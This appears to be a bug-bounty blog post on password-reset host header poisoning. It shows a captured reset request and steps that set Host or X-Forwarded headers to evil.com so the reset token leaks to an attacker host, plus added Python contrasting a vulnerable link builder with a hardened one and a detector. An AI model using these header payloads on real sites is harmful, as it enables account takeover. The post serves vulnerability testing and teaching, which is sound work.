How to find an easy P2

Hi everyone,

This post is about a low-effort P2 bug. It is not common and its severity is high, but finding it is a piece of cake and takes less than 5 minutes.

Here is a step-by-step procedure:

  1. Let's say we have the target example.com
  2. Go to the password reset feature, request a password reset and intercept the request
  3. Let's say the HTTP request looks like this (I have redacted all the gibberish cookies and the target name):

POST /api/reset-password/submit-email HTTP/1.1
Host: www.example.ca
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.ca/reset-password
Content-Type: application/json
X-CSRF-Token: [Redacted]
Origin: https://www.example.ca
Content-Length: 42
Connection: close
Cookie: ck_cabf=[Redacted]; ck_pcid=[Redacted]; _ga=[Redacted]; __utma=[Redacted]; __utmz=; ck_crumb=[Redacted]; utag_main=[Redacted]; _gid=[Redacted]; _gat=1

{"emailAddress":"[Redacted]"}

4. There are three things you can try to check for cache poisoning:

(i) Edit the host to Host: evil.com

(ii) Leave the host as it is and, on the line below Host, add X-Forwarded-Host: evil.com

(iii) If (ii) doesn't work, then use X-Forwarded-For: evil.com

5. If it is vulnerable, you will get the mail at your registered email address, and when you open the mail you will be redirected to something like https://evil.com/yourResetToken, which means the evil domain now has your token and it will cause account takeover.
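
To show what is going wrong on the server side in steps 4 and 5, here is an added example (not code from the original post or from any real target): a reset-link builder that trusts the request's Host / X-Forwarded-Host header, the hardened version that uses a configured host instead, and a small check that flags mismatched host headers on the reset endpoint so the attempt can be logged. The function names, ALLOWED_HOSTS / CANONICAL_HOST values and the sample request headers are constructed for illustration.

```python
from typing import Mapping, Optional

# Hosts the application is legitimately served on (assumed values).
ALLOWED_HOSTS = {"www.example.ca", "example.ca"}
CANONICAL_HOST = "www.example.ca"


def _header(headers: Mapping[str, str], name: str) -> Optional[str]:
    # Case-insensitive lookup, since HTTP header names are case-insensitive.
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def build_reset_link_vulnerable(headers: Mapping[str, str], token: str) -> str:
    # The bug: the link host comes from the request, so whoever sends the
    # request (step (i) or (ii) above) decides where the token is delivered.
    host = _header(headers, "X-Forwarded-Host") or _header(headers, "Host")
    return f"https://{host}/reset-password/{token}"


def build_reset_link_hardened(token: str) -> str:
    # The fix: never read the host from the request; the link always points
    # at the configured canonical host, so the token cannot be steered away.
    return f"https://{CANONICAL_HOST}/reset-password/{token}"


def host_mismatch(headers: Mapping[str, str]) -> list:
    # Detection aid: names of host-bearing headers whose value is not an
    # allowed host. Worth logging on the reset endpoint; empty means normal.
    suspicious = []
    for name in ("Host", "X-Forwarded-Host"):
        value = _header(headers, name)
        if value is not None and value.split(":")[0].lower() not in ALLOWED_HOSTS:
            suspicious.append(name)
    return suspicious


# Constructed sample requests: a normal one, then steps (i) and (ii) from the post.
NORMAL = {"Host": "www.example.ca", "Content-Type": "application/json"}
HOST_EDITED = {"Host": "evil.com", "Content-Type": "application/json"}
XFH_ADDED = {"Host": "www.example.ca", "X-Forwarded-Host": "evil.com"}

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("host edited", HOST_EDITED), ("xfh added", XFH_ADDED)):
        print(label, build_reset_link_vulnerable(req, "TOKEN"), host_mismatch(req))
    print("hardened", build_reset_link_hardened("TOKEN"))
```

The same pattern applies to any other forwarded header the application trusts for link building, including the X-Forwarded-For variant from step (iii).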

Hope you liked this.